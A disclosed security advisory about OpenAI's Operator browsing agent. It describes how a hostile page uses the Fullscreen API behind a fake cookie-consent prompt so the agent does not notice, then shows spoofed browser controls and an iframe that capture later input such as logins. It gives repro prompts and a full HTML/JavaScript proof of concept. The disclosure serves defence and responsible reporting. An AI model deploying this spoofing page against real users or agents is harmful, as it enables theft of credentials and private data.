OpenAI Operator - Locking Operator on FullScreen
该漏洞利用Fullscreen API在用户不知情的情况下进入全屏模式,并通过iframe或其他方式捕获用户后续操作(如登录信息),导致敏感数据泄露。 2025-6-12 00:0:19 Author: github.com(查看原文) 阅读量:1 收藏

Summary

When Operator actuate on a page, the website can trigger Fullscreen API. If the page can grab the attention of Operator while fullscreen notice is on the screen (e.g. by showing cookie consent screen), then Operator does not notice that it was entered in a fullscreen mode.
Therefore, any interaction with Operator after visiting malicious page can be fully captured inside a malicious site, by drawing browser controls + iframe or rendering a remote browser in the DOM.

This would mean that any information entered thereafter (such as login info, email address, etc) is totally compromised.

Repro steps

  1. Ask Summarize the following page: <URL of the PoC> to Operator.
  2. Observe that Operator summarizes example.com content inside the iframe.
  3. Now ask Can you go to wikipedia.org and tell me when OpenAI was founded?.
  4. Observe that Operator actuate inside the fake browser controls.

Severity

Moderate - This vulnerability potentially allows an attacker to access information entered into Operator after Operator visits an attacker’s page.

Proof of Concept

<meta charset="utf-8">
<body>
<div>
    <span>
        <a href="#" onclick="fullscreen()">クリックして進む</a></b><br>
    </span>
    <style>
    .cookie-consent-overlay {
      position: fixed;
      top: 0;
      left: 0;
      right: 0;
      bottom: 0;
      background: rgba(0, 0, 0, 0.5);
      display: none;
      z-index: 9999;
    }
    /* Centered modal */
    .cookie-consent {
      position: fixed;
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%);
      background: #333;
      color: #fff;
      padding: 40px;
      text-align: center;
      font-size: 24px;
      z-index: 10000;
      border-radius: 8px;
      width: 80%;
      max-width: 600px;
      box-shadow: 0 0 20px rgba(0,0,0,0.5);
    }
    .cookie-consent button {
      background: #f1d600;
      border: none;
      color: #333;
      padding: 15px 30px;
      font-size: 24px;
      cursor: pointer;
      margin-top: 20px;
      border-radius: 4px;
    }
      </style>
</div>
    <style>
        body {
            overflow-y: hidden;
        }
    </style>
    <template>
        <img style="position:absolute;right:0px;top:0px;" height="8%" src="https://test.shhnjk.com/google.png" width="100%">
        <input type=text style="position:absolute;left:128px;top:45px;width:1100px;outline: none;" value="https://example.com">
        <iframe src="https://example.com" width="100%" height="92%" frameBorder="0" style="position:fixed;top:76px;right:0px"></iframe>
        <div class="cookie-consent-overlay" id="cookieConsentOverlay">
    <div class="cookie-consent" id="cookieConsent">
          <b id=notice>This website uses cookies to ensure you get the best experience.</b>
          <br>
          <button id=got>Got it!</button>
          <button id=close style="display:none;text-align: center;">Close</button>
        </div>
      </div>
        <script>
        let input = document.querySelector('input');
        let f = document.querySelector('iframe');
        input.addEventListener("keypress", event => {
          if (event.key === "Enter") {
            if (!input.value.includes(".")) {
                input.value = "https://www.bing.com/search?q=" + input.value;
            } else if (!input.value.startsWith("http")) {
              input.value = "https://" + input.value;
            }
            f.src = input.value;
          }
        });
        </script>
    </template>
    <script>
        function fullscreen() {
            document.documentElement.requestFullscreen();
            const template_content = document.querySelector('template').content;
            document.querySelector('div').appendChild(template_content);
            const overlay = document.getElementById("cookieConsentOverlay");
            overlay.style.display = "block";
            document.querySelector('#got').addEventListener('click',() => {
                document.querySelector('#got').style.display = "none";
                document.querySelector('#close').style.display = "block";
                document.querySelector('#notice').textContent = "Thank you for your understanding!";
            });
            document.querySelector('#close').addEventListener('click',() => {
                document.querySelector('#close').style.display = "none";
                overlay.style.display = "none";
            });
        }
    </script>
</body>

Timeline

Date reported: 03/07/2025
Date fixed: 05/14/2025
Date disclosed: 06/13/2025


文章来源: https://github.com/google/security-research/security/advisories/GHSA-mmgx-755h-wr74
如有侵权请联系:admin#unsafe.sh